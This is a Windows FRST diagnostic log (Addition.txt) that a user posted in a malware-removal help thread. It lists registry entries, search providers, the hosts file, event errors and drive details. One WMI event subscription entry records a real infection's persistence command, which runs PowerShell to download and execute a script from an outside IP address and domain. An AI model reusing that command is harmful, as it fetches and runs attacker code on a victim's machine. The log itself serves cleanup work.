Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellServiceObjects: MediaCenterSSO Class -> {6FDEDD65-AC51-43CA-B2D0-9EB5D1155D03} => C:\Windows\ehome\ehSSO.dll
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvid.dll [602112 2015-02-10] () [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"::
WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.r...|powershell.exeIEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (the data entry has 362 more characters).]
==================== Loaded Modules (Whitelisted) =============
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_F928BDEE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMInstallerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsF928BDEEApp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\camsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dps => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_F928BDEE.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\lfsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMInstallerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MsF928BDEEApp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\semgrsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\shellhwdetection => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TokenBroker => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Version 11) (Whitelisted) ==========
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Main,Old Start Page = hxxps://www.yahoo.com/?fr=befhp&type=iehp-3.19-1703
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-1250379553-2428740185-3603661230-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=fp-yie11
HKU\S-1-5-21-1250379553-2428740185-3603661230-500\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://www.yahoo.com/?fr=fp-yie11
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> DefaultScope {005D2A05-0F31-4191-B3D0-EB5F0B615403} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.19-1703
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {005D2A05-0F31-4191-B3D0-EB5F0B615403} URL = hxxps://search.yahoo.com/search?ei=utf-8&fr=befds&p={searchTerms}&type=ieds-3.19-1703
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {180780f0-b348-4b44-8210-94a8f3ee15b2} URL = hxxp://search.comcast.net/search/?cat=Web&con=toolbar&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {2E85A483-4CB6-4841-BAFE-CFE8617C6789} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {54069629-7150-4432-85AD-826C66E24923} URL = hxxp://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {8657C459-5075-4FBA-8BFE-4CBF871F2795} URL = hxxp://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AFDCC033-36F7-40D5-9B8F-98FF5110CF48} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> DefaultScope {EF095A43-3A0C-434D-A6E7-32C433ADDB68} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {751DC1CE-8E0F-4F54-B56B-C1AFDC1E9B1D} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {C13F6BAC-A591-4391-A1BF-CB0DF6C9083A} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {EF095A43-3A0C-434D-A6E7-32C433ADDB68} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> DefaultScope {8665CF88-8873-4B00-9D4B-3900E6C9F53A} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {29C18FBE-6679-48BA-AFEA-78BBAECB468E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {2C7CA5FC-AE04-47C9-88CB-D32F45776BC9} URL = hxxp://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {8665CF88-8873-4B00-9D4B-3900E6C9F53A} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://isearch.avg.com/search?cid={FE4CF738-9FF4-4CB8-98D2-738ABE97B40A}&mid=408949922d1347d69a86b1a22fed5e2c-61e095b20595977a30febf70a3c5b2b516e4de0e&lang=us&ds=AVG&pr=fr&d=2011-12-12 09:44:38&v=17.3.0.49&pid=avg&sg=0&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
DPF: HKLM-x32 {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files (x86)\Yahoo!\Common\Yinsthelper.dll
DPF: HKLM-x32 {5AE58FCF-6F6A-49B2-B064-02492C66E3F4} hxxps://catalog.update.microsoft.com/v7/site/ClientControl/en/x86/MuCatalogWebControl.cab?1648482671878
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
DPF: HKLM-x32 {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~2\mcafee\msc\mcsniepl.dll No File
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\verizon.net -> hxxps://activate.verizon.net
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\verizon.net -> hxxps://activate.verizon.net
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\verizon.net -> hxxps://activate.verizon.net
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 22:34 - 2022-03-29 17:29 - 000000062 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 kr1s.ru
127.0.0.1 zcop.ru
127.0.0.1 sql.4i7i.com
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> %CommonProgramFiles%\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared\;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared\;C:\Program Files (x86)\Common Files\Roxio Shared\12.0\DLLShared\
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\Jay\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-1250379553-2428740185-3603661230-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Control Panel\Desktop\\Wallpaper -> C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
MSCONFIG\Services: HomeNetSvc => 2
MSCONFIG\Services: McBootDelayStartSvc => 2
MSCONFIG\Services: McMPFSvc => 2
MSCONFIG\Services: McNaiAnn => 2
MSCONFIG\Services: McODS => 3
MSCONFIG\Services: mcpltsvc => 2
MSCONFIG\Services: McProxy => 2
MSCONFIG\Services: MSK80Service => 3
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Restore Points =========================
==================== Faulty Device Manager Devices ============
Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: ========================
Application errors:
==================
Error: (03/29/2022 03:04:08 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Error: (03/29/2022 03:04:08 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description: Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Error: (03/28/2022 09:48:46 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Users\Marilyn\Desktop\FRST64.exe ; Description = Restore Point Created by FRST; Error = 0x80042302).
Error: (03/28/2022 09:48:46 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine IVssBackupComponents::SetContextInternal. hr = 0x800706ba, The RPC server is unavailable.
.
Operation:
Add a Volume to a Shadow Copy Set
Context:
Execution Context: Requestor
Error: (03/28/2022 09:25:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: winlogon.exe, version: 6.1.7601.17514, time stamp: 0x4ce79fa6
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000002f8b50
Faulting process id: 0x274
Faulting application start time: 0x01d842f2abd2723a
Faulting application path: C:\Windows\system32\winlogon.exe
Faulting module path: unknown
Report Id: 15371f08-aeff-11ec-825f-60eb6909b7df
Error: (03/28/2022 02:07:31 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\msiexec.exe /V; Description = Removed Java 7 Update 51; Error = 0x80042302).
Error: (03/28/2022 02:07:31 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine IVssBackupComponents::SetContextInternal. hr = 0x800706ba, The RPC server is unavailable.
.
Operation:
Add a Volume to a Shadow Copy Set
Context:
Execution Context: Requestor
Error: (03/28/2022 02:07:19 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\msiexec.exe /V; Description = Removed Java 7 Update 51; Error = 0x80042302).
System errors:
=============
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{4991D34B-80A1-4291-83B6-3328366B9097}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{6D18AD12-BDE3-4393-B311-099C346E6DF9}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{03CA98D6-FF5D-49B8-ABC6-03DD84127020}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{659CDEA7-489E-11D9-A9CD-000D56965251}
Error: (03/29/2022 07:45:11 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1068" attempting to start the service BITS with arguments "" in order to run the server:
{BB6DF56B-CACE-11DC-9992-0019B93A3A84}
Error: (03/29/2022 05:32:54 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service sdrsvc with arguments "" in order to run the server:
{687E55CA-6621-4C41-B9F1-C0EDDC94BB05}
Error: (03/29/2022 05:31:53 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Provider Host service which failed to start because of the following error:
The dependency service or group failed to start.
==================== Memory info ===========================
BIOS: Hewlett-Packard F.15 04/07/2011
Motherboard: Hewlett-Packard 1605
Processor: Intel® Celeron® CPU 900 @ 2.20GHz
Percentage of memory in use: 76%
Total physical RAM: 3002.92 MB
Available physical RAM: 718.82 MB
Total Virtual: 6003.98 MB
Available Virtual: 3856.62 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:216.47 GB) (Free:174.26 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.12 GB) (Free:2.28 GB) NTFS ==>[system with boot components (obtained from drive)]
\\?\Volume{8f022f87-fab2-11df-acd0-806e6f6e6963}\ (SYSTEM) (Fixed) (Total:0.19 GB) (Free:0.16 GB) NTFS
\\?\Volume{8f022f8a-fab2-11df-acd0-806e6f6e6963}\ (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92636A50)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=216.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.1 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)
==================== End of Addition.txt =======================
================================================================================
Overall the system is running much better. I'll do a normal boot now and see what happens and report back in a bit.
Thanks for all your help so far.
